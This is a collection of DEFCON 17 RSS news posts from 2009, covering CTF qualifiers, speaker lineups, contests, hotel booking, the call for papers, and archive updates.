https://www.defcon.org/defconrss.xml Qualifiers - July 17-18 Get your teams together and mark your calendar. Qualifiers will be the evenings of July 17-18. As teams sign up, we'll work with the team captains to finalize scheduling. Also, we'll group the individual reg's together into teams for the quals as well. If you haven't signed up, please do so sooner rather than later. NOTE you don't need a full team to sign up a team. If you've got 4 or 5 friends you want to play with, register a team and we'll fill the blanks up with individual reg's later. Sign up at: http://www.nomoose.org/dctf2/

==> Coffee Wars Call for Beans

https://www.defcon.org/defconrss.xml http://www.coffeewars.org/CallForBeans.shtml From shrdlu on the DEFCON Forums: Information for those hoping to win on our momentous Tenth Year of celebrating caffeine. You can submit your beans before Friday morning, by various arcane methods, none of which will be posted here (but email to Foofus might help). You *MUST* submit them before 10AM (or close to it), since that's when we start brewing and drinking and judging. We'll send the occasional messenger out into the massed and frightening horde if you are trying to bring it Friday morning. Coffee Wars only takes place on Friday morning. We're usually done by 11-ish, and vanished completely by Noon. You can spot most of the judges the rest of the day due to the slight vibration of their entire body (except me; I *like* that much caffeine).

==> DEFCON 17 Artwork Contest Winners!

https://www.defcon.org/defconrss.xml Congratulations to the winners of the DEFCON 17 Artwork Contest! People's Choice: "Watchmen Parody" by Mar T-shirt Category: "Floppy" by JesseK Poster Category: "DEFCON 17" by Steve Andrus Bumper Sticker Category: "Tailing The Elite Hacker" by downtownDB Honorable Mention goes out to "DT Has a Posse" by Mar! Thank you to all of the entrants for their great work!

==> DEFCON 17 Speaking Schedule is Live and Final Speakers are Posted!

https://www.defcon.org/defconrss.xml That's right! The DEFCON 17 Schedule is now live! It may experience a few minor changes before all is said and done, but it is pretty much good to go! Events will be posted on the schedule page as exact times roll in, so keep your eyes peeled for updates! If you are a speaker and see any discrepancies, pass them along to talks at defcon dot org. Go have a look, and while your at it, check out the last batch of awesome speakers we have lined up for you this year: Preparing for Cyber War: Strategy and Force Posture in the Information-Centric World Dmitri Alperovitch, Marcus Sachs, Phyllis Schneck and Ed Skoudis Hello, My Name is /hostname/ Endgrain, Dan Kaminsky and Tiffany Rad Dradis Framework - Sharing Information will get you Root etd 0-day, gh0stnet and the Inside Story of the Adobe JBIG2 Vulnerability Matt Richard and Steven Adair Three Point Oh. Johnny Long Reverse Engineering By Crayon: Game Changing Hypervisor Based Malware Analysis and Visualization Danny Quist and Lorie M. Liebrock Cracking 400,000 Passwords, or How to Explain to Your Roommate why the Power Bill is a Little High Matt Weir and Sudhir Aggarwal Catching DNS Tunnels with AI Jhind Perspective of the DoD Chief Security Officer Robert Lentz

==> Big Speaker Update on defcon.org! Adam Savage to speak at DEFCON 17!

https://www.defcon.org/defconrss.xml Check out the big old list of hotness on https://www.defcon.org, we have just added 39 more speakers to the site! There are only a few speakers yet to post, and the schedule is being webbified into a more mobile-friendly format (than past years) as we speak, so expect more updates in the next couple of days! You may have already heard on Twitter, it is our pleasure to officially announce that Adam Savage of MythBusters fame will be speaking this year at DEFCON! So get on over to defcon.org and check it all out, and remember to follow us on Twitter for updates as they occur!

==> Voting is Open for the DEFCON 17 Artwork Contest!

https://www.defcon.org/defconrss.xml Here's what you do: go to the DEFCON 17 Artwork Contest Gallery on pics.defcon.org and pick your favorite. Then head on over here and vote in the poll! The default display for the gallery is 12 items per page, so make sure you check out all 3 pages. There are 29 entries total. Good Luck to all the fantastic entries!

==> DEFCON 17 DJ pages are live!

https://www.defcon.org/defconrss.xml Check out the new DJ pages on the DEFCON 17 site! You can find line-ups for the Black & White bleep, Pool Parties, and daytime Chillout area! There are also artist bios and samples of the music you might encounter! It's all at https://www.defcon.org/html/defcon-17/dc-17-djs.html! And don't forget to follow the DEFCON Twitter feed for news as it happens, leading up to and during DEFCON 17!

==> Thursday Talks Line-up at DEFCON 17

https://www.defcon.org/defconrss.xml This year, we're packing even more goodness into Thursday's activities, with a half day of talks aimed at the DEFCON n00b. These talks will cover everything from basic hacking skills to what our beloved con is about, and how to get the most out of it. If you are new to DEFCON, or feel like you could get more out of it, this "basic training" will be an invaluable resource! DEFCON 101 HighWiz, The Dark Tangent, Russr, DJ Jackalope, Deviant Ollam, Thorn, ThePrez98, LosT, Siviak Pre-Con Introduction to Lock Picking Alek Amrani DEFCON 1 - A Personal Account Dead Addict Con Kung-Fu: Defending Yourself @ DEFCON Rob "Padre" DeGulielmo Hardware Black Magic - Building devices with FPGAs Dr. Fouad Kiamilev DCFluX in: The Man with the Soldering Gun Matt Krick "DCFluX" Effective Information Security Career Planning Lee Kushner and Mike Murray DC Network Session Lockheed So You Got Arrested in Vegas... Jim Rennie Hacking with GNURadio Videoman

==> Mystery Challenge Registration Update

https://www.defcon.org/defconrss.xml
Mystery Challenge Registration Update Congratulations to the following teams: 1. Team Silverlock 2. Team Psychoholics 3. Team Kuro 4. MobileDisco 5. Team Render 6. Team Security Catalyst 7. Team Lords of Failure 8. DEADC0DE 9. Team America (@#$& YEAH!) There are still a few slots available. Are YOU up to the challenge? 1o57

==> Even More DEFCON 17 Speaker Updates!

https://www.defcon.org/defconrss.xml Yes folks, yet another batch of great talks has been posted on the speaker page! That should do it for this week, but stay tuned next week for the last batches of talks to go up! Panel - Ask EFF: The Year in Digital Civil Liberties Kurt Opsahl, Jennifer Granick, Kevin Bankston, Fred von Lohmann, Marcia Hofmann and Peter Eckersley Panel - Meet the Feds 2009 The Middler 2.0: It's Not Just for Web Apps Anymore Jay Beale and Justin Searle Beckstrom's Law - A Model for Valuing Networks and Security Rod Beckstrom Sharepoint 2007 Knowledge Network Exposed Digividual Socially Owned in the Cloud Digividual Personal Survival Preparedness Steve Dunker and Kristie Dunker Social Zombies: Your Friends Want to Eat Your Brains Tom Eston and Kevin Johnson Cracking the Poor and the Rich: Discovering the Relationship Between Physical and Network Security Damian Finol FOE -- Feeding Controversial News to Censored Countries (Without Using Proxy Servers) Sho bleep Hardware Black Magic - Building devices with FPGAs Dr. Fouad Kiamilev Hack The Textbook Jon R. Kibler and Mike Cooper Advanced SQL Injection Joseph McCray Weaponizing the Web: New Attacks on User-generated Content Shawn Moyer and Nathan Hamiel Automated Malware Similarity Analysis Daniel Raygoza The Security Risks of Web 2.0 David Rook Proxy Prank-o-Matic Charlie Vedaa and "Anonymous secondary speaker"

==> CTF Quals Are Over, But There are Other Bases to Belong

https://www.defcon.org/defconrss.xml The CTF Quals round has ended! DEFCON congratulates the qualifying teams! From ddtek.biz: Qualified teams: 1. sk3wlm4st3r (CONFIRMED! as sk3wl0fr00t) 2. Team Awesome (aka VedaGodz) (CONFIRMED!) 3. Sexy Pwndas (unconfirmed) 4. PLUS (unconfirmed) 5. Shellphish (CONFIRMED!) 6. Song of Freedom (CONFIRMED!) 7. lollerskaterz dropping from roflcopters (CONFIRMED!) 8. Underminers (unconfirmed) 9. Routards (CONFIRMED!) 10. WOWHACKER (CONFIRMED!) alt. Sapheads_ (CONFIRMED!) alt. sutegoma (CONFIRMED!) alt. CLiP (unconfirmed) alt. pebkac (unconfirmed) alt. ACMEPharm (unconfirmed) If you didn't make it and still want a mind bending challenge at DEFCON this year, there a few slots left in LosT's Mystery Challenge, so wrangle up a team and get to ten-five-seven.org to find clues on how to enter! Open CTF will also be back this year, bigger and badder than ever if you need that attack/defend goodness!

==> DEFCON 17 Speaker Update

https://www.defcon.org/defconrss.xml Here are a few more talks to keep you going! We have a bunch more coming through the end of the week, so stay tuned. Follow the DEFCON Twitter Feed for announcements as they are posted! BitTorrent Hacks Michael Brooks and David Aslanian Unfair Use - Speculations on the Future of Piracy Dead Addict DEFCON 1 - A Personal Account Dead Addict Con Kung-Fu:Defending Yourself @ DEFCON Rob "Padre" DeGulielmo Router Exploitation FX Jackpotting Automated Teller Machines Barnaby Jack Something about Network Security Dan Kaminsky Malware Freak Show Nicholas J. Percoco and Jibran Ilyas That Awesome Time I Was Sued For Two Billion Dollars Jason Scott Good Vibrations: Hacking Motion Sickness on the Cheap Tottenkoph

==> DEFCON 17 News

https://www.defcon.org/defconrss.xml Keep your eyes on the DEFCON 17 site for a page coming soon that will give you the lowdown on all the great DJ's that will spin at DEFCON this year. We'll have pics and bios, as well as sample tracks for download! Also, due to the great number of awesome talks we're accepting in the 1200 second spotlight, we've decided to make a fifth track for turbo/breakout talks! So keep watching for more updates, and as always, You can follow the DEFCON Twitter feed for links to the info as it's posted!

==> DEFCON 17 CFP Update

https://www.defcon.org/defconrss.xml If you submitted a CFP and have not been notified of it's status hold tight! We have a lot of submissions this year that we want to accept. If you haven't heard back from us by now, you're still in consideration for a time slot. We're probably trying to find room for you. Sorry we missed our June 1st notification date, but we have too much awesome sauce for our burgers. An update will be posted to the website when we have finished our selection process, all CFP's will be sent an email of their status at that point. Thanks!

==> Thursday (July 30th) at DEFCON 17

https://www.defcon.org/defconrss.xml In the past, we have usually opened up registration and swag midday Thursday for those early birds that want to get a jump on things before the con officially starts. There are also a few unofficial events and gatherings, like the Toxic BBQ and theSummit, that make Thursday almost an extra day of DEFCON. This year, we're packing even more goodness into Thursday's activities, with a half day track of talks aimed at the DEFCON newb. These talks will cover everything from basic hacking skills to what our beloved con is about, and how to get the most out of it. If you are new to DEFCON, or feel like you could get more out of it, this "basic training" will be an invaluable resource! In addition, the Chill Out Area will be open for hanging out and the infamous DEFCON wireless network will be up and running, so you can pwn or be pwned right out of the gate! Stay tuned for a complete listing of all the great talks planned for Thursday, and as always, you can get instant updates as they occur by following the DEFCON Twitter feed!

==> DEFCON 17 Mystery Challenge Update

https://www.defcon.org/defconrss.xml LosT can neither confirm nor deny that registration is currently open for the LosT@Con Mystery Challenge. See Ten-Five-Seven.org for updates. Kuni welcomes you to the wheel of fish.

==> Updates and Reminders for DEFCON 17

https://www.defcon.org/defconrss.xml Riviera Rooms: Be sure to book your room for this year's DEFCON! The Riviera is offering a DEFCON 17 special room rate of $89/night for 1-2 guests, add $20/night for guests 3-4. Hurry, space is limited, and our block usually sells out early! New DJ Organizer: Welcome to DJ Great Scott, who has accepted the mantle of DJ organizer for DEFCON 17. He will be the overlord of the Black and White bleep and the Poolside DJ action! Get ahold of him on the Forums (greatscott) or at blackandwhitedjs@gmail.com if you want to spin! Capture the Flag: CTF Quals Registration ends 6/4/09! Get your teams together and get in there! Register at: http://ddtek.biz/ctf/register.html Artwork Contest: Only about 2 weeks left in the DEFCON 17 Artwork Contest! Make some hacker art and win fabulous prizes (like free entry to DEFCON 17 and swag!) Rules posted at: https://www.defcon.org/html/defcon-17/dc-17-artwork-contest.html Contest & Events: Check out the Contests and Events section of the forums to see what's new! TommEE Pickles has resurrected the CannonBall Run, there's a new game called the 10,000 Cent Hacker Pyramid, and Coffee Wars is having it's 10th birthday! Extended hours at the pool mean Pool Party! As always, follow the DEFCON Twitter for all the announcements as they occur!

==> New DEFCON Tools Page is Live!

https://www.defcon.org/defconrss.xml Check out the DEFCON Tools page, a new section of the archives that collects the innovative tools released at DEFCON talks over the years! We currently have a list of the tools released at DEFCON 16, and are working backward to archive the tools from past shows. Special thanks to Mubix (aka Rob Fuller), of room362.com, for graciously collecting and writing up this content! All the tools Mubix could find are archived on the DEFCON media server. If you have access to a tool that is not locally stored, let us know at neil [at] defcon ]dot[ org and we'll get it up there!

==> More Talks for DEFCON 17!

https://www.defcon.org/defconrss.xml Here's another great round of talks to get you excited for DEFCON 17! DefCon 101 HighWiz, The Dark Tangent, Russr, DJ Jackalope, Deviant Ollam, Thorn, ThePrez98, Lost, Siviak Session Donation Alex Amrani Sniff Keystrokes With Lasers/Voltmeters - Side Channel Attacks Using Optical Sampling Of Mechanical Energy And Power Line Leakage Andrea Barisani and Daniele Bianco Hijacking Web 2.0 Sites with SSLstrip--Hands-on Training Sam Bowne Attacking SMS. It's No Longer Your BFF Brandon Dixon Breaking the "Unbreakable" Oracle with Metasploit Chris Gates and Mario Ceballos Injectable Exploits: Two New Tools for Pwning Web Apps and Browsers Kevin Johnson, Justin Searle and Frank DiMaggio eXercise in Messaging and Presence Pwnage Ava Latrope Defcon Security Jam 2: The Fails Keep on Coming David Mortman Hacking Sleep: How to Build Your Very Own Sleep Lab Ne0nRa1n and Keith Biddulph RFID MythBusting Chris Paget Search And Seizure Explained - They Took My Laptop! Tyler Pitchford, Esq. Fragging Game Servers Bruce Potter and Logan Lodge Hackerspaces: The Legal Bases RogueClown Debaze - A Remote Method Enumeration Tool for Flex Servers Jon Rose Bluetooth, Smells Like Chicken. Dominic Spill, Michael Ossmann and Mark Steward "I Am Walking Through a City Made of Glass and I Have a Bag Full of Rocks" (Dispelling the Myths and Discussing the Facts of Global Cyber-Warfare) Jayson Street Dangerous Minds: The Art of Guerrilla Data Mining Mark Ryan Del Moral Talabis Follow us on Twitter!

==> DEFCON 17 Speaker Update!

https://www.defcon.org/defconrss.xml The CFP is now closed and selection is in full swing! Check out the latest batch of talks selected for DEFCON 17! Unmasking You Joshua D. Abraham and Robert Hansen Confidence Game Theater cough Death of Anonymous Travel Sherri Davidoff Using Guided Missiles in Drive-Bys: Automatic browser fingerprinting and exploitation with Metasploit Egypt "Smart" Parking Meter Implementations, Globalism, and You (aka Meter Maids Eat Their Young) Joe "Kingpin" Grand, Jake Appelbaum, and Chris Tarnovsky The Psychology of Security Unusability Peter Gutmann Effective Information Security Career Planning Lee Kushner and Mike Murray Abusing Firefox Addons Roberto Suggi Liverani and Nick Freeman Clobbering the Cloud Haroon Meer and Marco Slaviero RAID Recovery: Recover your bleep by Sight and Sound Scott Moulton Protecting Against and Investigating Insider Threats (A methodical, multi-pronged approach to protecting your organization) Antonio "Tony" Rucci PLA Information Warfare Development Timeline and Nodal Analysis Zulu Meet Be sure to follow the DEFCON Twitter Feed for speaker updates and other announcements as they occur!

==> Notice to DEFCON 17 CFP Submitters

https://www.defcon.org/defconrss.xml This is just a general reminder, we want to make sure all the submissions sent to us get a fair shot and are reviewed equally. We don't want any submissions missed so we send you an email to let you know it arrived safely. You should receive an acknowledgment of your submission within 48 hours after you have submitted. If you have not received an email from us, please resend your submission to talks at defcon dot org.

==> DEFCON 17 CFP Extended over Weekend!

https://www.defcon.org/defconrss.xml That's right slackers, you now have until Monday, May 18th to turn in your DEFCON CFP Submission! We want your insightful and interesting research to make it to the DEFCON 17 Stage! So get on it, what are you doing reading this? Go work on your submission! You can read the submission rules and get the CFP form at: https://www.defcon.org/html/defcon-17/dc-17-cfp.html

==> DEFCON 17 Talks Update

https://www.defcon.org/defconrss.xml Here are a few more of the talks chosen for DEFCON 17 to whet your appetite: Why Tor is Slow, and What We're Doing About It Roger Dingledine Managed Code Rootkits - Hooking into Runtime Environments Erez Metula Maximum CTF: Getting the Most Out of Capture the Flag Psifertex Hacking, Biohacking, and the Future of Humanity Richard Thieme As always, we will be posting these talks as they are chosen, so keep your eyes on the speakers page! Better yet, follow the DEFCON Twitter Feed for up to the minute notification of new talks, and all of the announcements relating to DEFCON 17!

==> The Mystery Challenge Has a New Home! Team Registration Opening Soon!

https://www.defcon.org/defconrss.xml The much loved and anticipated LosT@Con Mystery Challenge has a new home on the web at https://ten-five-seven.org! LosT informs us that team registration for this year's challenge will be opening soon, so keep your eyes peeled on the new site, and on the Mystery Challenge Forum on the DEFCON Forums for all the details on how to enter and for clues relating to the challenge!

==> DEFCON 17 Artwork Contest is Open!

https://www.defcon.org/defconrss.xml It's that time again, art ninjas! Whip out your favorite medium and get to creating, because the official DEFCON 17 Artwork Contest is now underway, and will run now to June 15, 2009. The goal for this year's artwork contest is to create a piece of art you would see plastered on a wall, mailbox, telephone pole or bumper of a car of the nearest urban center. What we're looking for is an underground feel, reminiscent of DIY 'zines, gig posters, or pulp comics... (Read on)

==> More DEFCON 17 Talks Selected!

https://www.defcon.org/defconrss.xml Speaker selection is underway, here are a few of the chosen talks! Expect more early to mid next week! Win at Reversing: Tracing and Sandboxing through Inline Hooking Nick Harbour Computer and Internet Security Law - A Year in Review 2008 - 2009 Robert Clark Making Fun of Your Malware Michael Ligh & Matthew Richard De Gustibus, or Hacking your Tastebuds Sandy Clark "Mouse" Hacking UFOlogy 102: The Implications of UFOs for Life, the Universe, and Everything Richard Thieme For all of the latest updates as they occur, be sure to follow us on Twitter at https://twitter.com/_defcon_

==> DEFCON 17 Site and First Round of Speakers are Live!

https://www.defcon.org/defconrss.xml The first round of speakers have been chosen with another to follow soon! You can check them out on the DEFCON 17 site, which is now live and will contain all the info for this year's con!

==> The Riviera - Good Changes for DEFCON 17

https://www.defcon.org/defconrss.xml This year at the Riv we'll see some nice changes to some of the pricing and policies of the hotel. Some initial RIV updates from the Dark Tangent on the DEFCON Forums: 1 - Room prices have been dropped to $89/Day and should be reflected here soon: http://www.rivierahotel.com/resnet/roomres.asp?ID=309 If you booked under the old prices I _think_ the pricing will automagically be reflected in your bill as the new room block price. 2 - We will get the pool to 11pm for swimming and hanging out. We can do low key DJ action till then. We are currently talking with them to determine how we can keep it longer. 3 - Drink prices on beer and booze have been reduced. I'll update this post when I have accurate information. We'll post more updates and details as they become available!

==> DEFCON 17 Booking Rate for the Riviera is Live

https://www.defcon.org/defconrss.xml Time to book those rooms for DEFCON 17. The Riviera has posted the booking info for this year's show. They are offering a rate of $102USD per night for 1-2 guests (add $20USD for additional guests up to 4). Note: The Nevada State Senate passed a law to increase room tax to 12% effective July 1, 2009. The tax increase will apply to all rooms occupied on and after July 1, 2009 regardless of when the reservation was made. You can acquire your room online at the following url: http://www.rivierahotel.com/resnet/roomres.asp?ID=309

==> DEFCON 17 CTF Qualifier announced dispite conficker

https://www.defcon.org/defconrss.xml FOR IMMEDIATE RELEASE 1 APRIL 2009 DEFCON CTF QUALIFIER ANNOUNCED Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFON 17 CTF. The competition will be held on 5-7 June - without a stop, participants can be located everywhere. All are to play, but only the 9 best groups will be invited to join us in Las Vegas for the annual DEFCON ninja square off. We also intend to honour the code of the former CTF host and automatically qualify last years champion, the sk3wl of r00t (although we sincerely hope them to participate in qualifications). The qualification round will be in the style of game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking into a vast relm of security. You must be registered for participate. Registration site: http://ddtek.biz/ctf/register.html Registration opens: 01.04.2009 00:00:00 UTC Registration ends: 04.06.2009 00:00:00 UTC Qualifications open: 05.06.2009 23:00:00 UTC Qualifications ends: 07.06.2009 23:00:00 UTC More information that will follow via your registered email address. Bring all your l33t haxor skillz just leave your Kiddie toolz behind. Vulc@n Difensiva Senior Engineer Diuntinus Defense Technologies, Inc.

==> DEFCON CNN Interview

https://www.defcon.org/defconrss.xml DEFCON's very own Russ Rogers was interviewed on CNN about the con and the motivations behind the Conficker Worm. Check it out!

==> New Format for DEFCON 15 & 16 Archives!

https://www.defcon.org/defconrss.xml Check out the new format for the DEFCON Archives! DC15 and DC16 have been converted, and the rest are being ported over as we speak! The new format combines links to Presentations in audio & video, Media RSS feeds, Conference Programs, Press from the show, and more in to one easy page for each past DEFCON. DEFCON 16 Archive: https://www.defcon.org/html/links/dc-archives/dc-16-archive.html DEFCON 15 Archive: https://www.defcon.org/html/links/dc-archives/dc-15-archive.html Check 'em out!

==> Redesigned DEFCON Site Beta is Live!

https://www.defcon.org/defconrss.xml The DEFCON website has been given a fresh new face, designed to deliver relevant content, inspire interaction within the community, and be more mobile friendly. We've released this beta to get feedback from you, the user, as we begin to flesh out the new features. Take a look around, on different browsers and devices, and if you like, report any bugs or voice suggestions to <strong>neil [at] defcon ]dot[ org</strong>. We're adding a few new items to the site, restructuring and expanding the archives section, and highlighting community news and events. Keep your eyes on the DEFCON RSS, Forums, Twitter, and/or LinkedIn Group for announcements as these features are completed and implemented.

==> The new DEFCON 17 CTF Organizers have spoken

https://www.defcon.org/defconrss.xml The newly chosen organizers of this year's CTF competition, Diutinus Defense Technologies, Inc., have broken their silence on the DEFCON Forums. You can view the post at https://forum.defcon.org/showthread.php?t=10246&page=3. The have also posted a website at http://www.ddtek.biz

==> And the new DEFCON 17 CTF Organizer is...

https://www.defcon.org/defconrss.xml The fine authors of Proposal #1 on the DEFCON 17 CTF Submissions Thread. We are not at liberty to divulge much more than this at this time, but you can read DT's announcement and keep yor eyes peeled for new details at the aformentioned links!

==> Contest and Event Status for DEFCON 17

https://www.defcon.org/defconrss.xml It's going to be another great year of events and contests at DEFCON, the ideas are flying and some new players have emerged. A couple of new items for this year are DefCon 101: A Lurkers Guide to DefCon, and the DEFCON Geo Challenge. You can check out all of the latest contest and event info on the DEFCON 17 Official and Unofficial Events and Contests Forum.

==> DEFCON 17 CTF Proposals On the Forums!

https://www.defcon.org/defconrss.xml DT has sanitized and posted the CTF Proposal submissions on the DEFCON Forums at https://forum.defcon.org/showthread.php?t=10246 to be viewed and commented on by the community. Check them out and weigh in on which one you think should be chosen for 2009!

==> DEFCON 16 Audio now available!

https://www.defcon.org/defconrss.xml I've started to upload all the audio and video from DEFCON 16! This year we are offering something new, a combo video file that has both the slides as well as the video of the speaker on the same screen. These files are big! If you just want to listen to a talk I suggest downloading the m4b audio files.. they are 1/2 the size of years past and will easily fit on your phone.. about 5 to 10 megs each. Audio files have finished uploading! https://www.defcon.org/podcast/defcon-16-audio.rss Video of just the presentation slides with audio are uploading now, should take a day or so to be available, then the combo video files will be uploaded. Let the leeching begin! Report any problems on this forum thread. The Dark Tangent

==> Submissions for CTF Organizers ends this weekend!

https://www.defcon.org/defconrss.xml Just a friendly reminder, if your group wants to set the bar to take the fame, and the massive challenge of being the next Capture the Flag Organizers for DEFCON, you must get your submissions in by this weekend! Good Luck! This thread on the DEFCON Forums has all the details!

==> DEFCON 17 Call For Papers is Open!

https://www.defcon.org/defconrss.xml xxxxxxxxxxxxxxxxxx xxx xx x xx DEF CON 17, Las Vegas 2009 xxxxxxxXXXXxxxxxxxxxxxxx xx x x July 31st - August 2nd xxxxxxXXXXXXxxxxx x x x The Rivera Hotel and Casino xxxxxXXXXXXXXxxxxx xx x x Las Vegas, Nevada, USA xxxxXXXXXXXXXXxxx x xxxxxxxx x https://www.defcon.org/ xxxXXXXXXXXXXXXxxxxxxxxxx x xxXXXXXXXXXXXXXXxxxxxx xx x Call for Papers Call for Papers xxxXXXXXXXXXXXXxxxxxxxx Call for Papers Call for Papers xxxxXXXXXXXXXXxxxxxxxx x x xx Call for Papers Call for Papers xxxxxXXXXXXXXxxxxxxx xxx xx x Call for Papers Call for Papers xxxxxxXXXXXXxxxxxxx x x x Call for Papers Call for Papers xxxxxxxXXXXxxxxxxxxxxx xx x x Call for Papers Call for Papers xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x Call for Papers Call for Papers Dark monks of techno-fu, it is that time of the year again! The DEFCON CFP is now open! What: DEFCON 17 Call For Papers When: The Call for Papers will close on May 15, 2009 How: Complete the Call for Papers Form and send to talks at defcon dot org Don't know what DEFCON is? Go to www.defcon.org and clue up! Papers and presentations are now being accepted for DEFCON 17, the conference your mother and ISC(2) warned you about. DEFCON will take place at the Riviera in Las Vegas, NV, USA, July 31 - August 2, 2009. Two years ago we eliminated specific speaking tracks and we received a diverse selection of submissions. From hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We will group presentations by subjects and come up with topic clusters of interest. It worked out so well in the past we are doing it again this year. What are we looking for then, if we don't have tracks? Were looking for the presentation that you've never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn't ask for, but blows their minds when they see it. We want strange demos of Personal GPS jammers, RFID zappers, and HERF madness. Got a MITM attack against cell phones? We want to see it. Subjects that we have traditionally covered in the past, and will continue to accept include: Trojan development, worms, malware, intelligent agents, protocol exploits, application security, web security, database hacking, privacy issues, criminal law, civil law, international law/treaties, prosecution perspectives, 802.11X, bluetooth, cellular telephony protocols, privacy, identity theft, identity creation, fraud, social implications of technology, media/film presentations, firmware hacking, hardware hacking, embedded systems hacking, smartcard technologies, credit card and financial instrument technologies, surveillance, counter-surveillance, UFO's, peer2peer technologies, reputation systems, copyright infringement and anti-copyright infringement enforcement technologies, critical infrastructure issues, physical security, social engineering, academic security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST technologies, corporate espionage, IDS evasion. What a mouth full! Well you can't say we didn't give you some ideas. This list is not intended to limit possible topics, merely to give examples of topics that have interested us in the past, and is in fact the same list we used last year.. Check out https://www.defcon.org/html/defcon-16/dc-16-speakers.html for past conference presentations to get a complete list of past topics that were accepted if you want to learn from the past. We are looking for and give preference to: unique research, new tool releases, -day attacks (with responsible disclosure), highly technical material, social commentaries, and ground breaking material of any kind. Want to screen a new hacking documentary or release research? Consider DEFCON. Speaking Formats: Choose between 12 hundred seconds, 50 minutes, 110 minutes, 1/2 day Thursday or a break out format of a length you determine. We are continuing the Twelve Hundred Second Spotlight, which is a shorter presentation (about twenty minutes) that doesn't warrant a full 50 or 110 minute talk. The Twelve Hundred Second Spotlight is designed for those who don't have enough material for a full talk, but still have a valuable contribution to make. This is to ensure that great ideas that can be presented quickly don't fall through the cracks merely because they didn't justify a full length talk. Examples include research, announcements, group presentations, projects needing volunteers or testers, requests for comments, updates on previously given talks, quick demonstrations. You get the idea. Presenters will get a speaker badge which entitles them to free admittance to DEFCON, but we will be unable to pay an Honorarium. Remember being attacked by Gran Master Ratt's Flame Crotch? Do you remember thick accented Germans trying to convince you to attack critical infrastructure? Do you remember extravagant vapor ware releases by a stage filled with posses? We do, and sans projectiles of raw meat we want to encourage such shenanigans again this year. We are calling on all "hacker groups" (you know who you are, and the FBI has a nifty file with your name on it) to present at DEFCON, to discuss what you're up to, what your mission is, to discuss any upcoming or past projects, and to discuss parties/conferences you are throwing. We do humbly request that all gang warfare be relegated to electronic attacks, and not fall over into meat space. New for DEFCON 17: NEW this year is a 1/2 day set of tracks on Thursday, pre-con, to help orient newbies and provide 1/2 day training on different 'foundational' subjects such as networking, building custom Linux distros, a work shop on modding your PSP, the fundamentals of radio, things like that. These sessions will get you in the mood for the main conference and give you something to do if you showed up early Thursday. As such your submissions for the Thursday sessions should be entertaining and help attendees who are fairly new get their feet under themselves, or give more advances hacker types a half day of fun gutting their TiVo. If you want to present a 1/2 day training or newbie talk just make sure you mark down you want to present on Thursday. We have ALL the speaking rooms this year, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! To submit a speech: Complete the DEFCON 17 Call for Papers Form. We are going to continue last year's goal of increasing the quality of the talks by screening people and topics. I realize you guys are speaking for basically free, but some talks are better than others. Some people put in a bit more effort than others. I want to reward the people who do the work by making sure there is room for them. This year we will have two rounds of speaker acceptance. In the first round we will fill about half of the schedule before the submission deadline, and the remaining half afterwards. This is to encourage people to submit as early as possible and allows attendees to plan on the topics that interest them. If you see the schedule on-line start to fill, do not worry if you have not heard from us yet, as we are still in the process of selection. Barring a disaster of monstrous proportions, speaker selection will be completed no later July 1. The sooner you submit the better chance you have of the reviewers to give your presentation the full consideration it warrants. If you wait until the last minute to submit, you have less of a chance of being selected. After a completed CFP form is received, speakers will be contacted if there are any questions about their presentations. If your talk is accepted you can continue to modify and evolve it up until the last minute, but don't deviate from your accepted presentation. We will mail you with information on deadlines for when we need your presentation, to be burnt on the CDROM, as well as information for the printed program. Speakers get in to the show free, get paid (AFTER they give a good presentation!), get a coolio badge, and people like you more. Heck, most people find it is a great way to meet people or find other people interested in their topics. Speakers can opt to forgo their payment and instead receive three human badges that they can give to their friends, sell to strangers, or hold onto as timeless mementoes. Receiving badges instead of checks has been a popular option for those insisting on maintaining their anonymity. Please visit: https://www.defcon.org/ for previous conference archives, information, and speeches. Updated announcements will be posted to news groups, security mailing lists and this web site. https://forum.defcon.org/ for a look at all the events and contests being planned for DEFCON 17. Join in on the action. https://pics.defcon.org/ to upload all your past DEFCON pictures. We store the pictures so you don't have to worry about web space. If you have an account on the forums, you have an account here. https://www.defcon.org/defconrss.xml for news and announcements surrounding DEFCON. CFP forms and questions should get mailed to: talks/at/defcon.org

==> Call for DEFCON 17 Capture the Flag Organizers!

https://www.defcon.org/defconrss.xml WANTED: An evil large multinational corporation, or... A nefarious group of genius autonomous hackers, or... A shadowy government organization from somewhere in the world TO: Host, recreate, and innovate the worlds most (in)famous hacking contest. WHY: For everlasting fame, intrusive media interviews, the respect of your peers, or the envy of your enemies. Do you have what it takes and know what we're talking about? Go to https://forum.defcon.org/showthread.php?t=10130 for all the details!

==> Call for Updates: Unofficial DEFCON FAQ

https://www.defcon.org/defconrss.xml From HighWiz on the DEFCON Blogs: The original "Unofficial DefCon FAQ" wasn't the work of one single individual but a collaboration by many people. I view my role as more of an organizer of the information rather than the creator of it. Version 1.0 is seriously outdated, http://defcon.stotan.org/faq/ and in need of a refresh. So I figured I'd utilize this blog space to request feedback on version 2.0 . To find out more and how to contribute, got to https://forum.defcon.org/blog.php?b=101

==> DEFCON Forums Now SSL Only

https://www.defcon.org/defconrss.xml Due to overwhelming feed back for the positive, the DEFCON Forums are now strictly SSL. This change has enabled us to utilize page compression which was previously unavailable, which speeds up page delivery. It will also enhance security, since the all sessions will now be encrypted. If you haven't already joined the DEFCON Forums, you should, it's a great place to keep in touch with the DEFCON community and to be a part of the discussion and planning leading up to the next DEFCON! Check it out at: forum.defcon.org

==> Subway Hackers Now Working with MBTA

https://www.defcon.org/defconrss.xml Well the dust has settled, and the lawsuit against three MIT students, who were to speak at DEFCON 16 about vulnerabilities in the Boston subway ticketing system, has been dropped. It seems now they will be working with the MBTA to help secure the ticketing systems. The researchers, who were federally gagged from speaking at DEFCON, were represented by the EFF and the gag order was dropped shortly after con. you can read the EFF Press release at http://www.eff.org/press/archives/2008/12/22, and there is an article on the PCWorld site at http://www.pcworld.com/article/155903/with_lawsuit_settled_hackers_now_working_with_mbta.html

==> Order DEFCON 16 Presentation DVDs From The Source of Knowledge

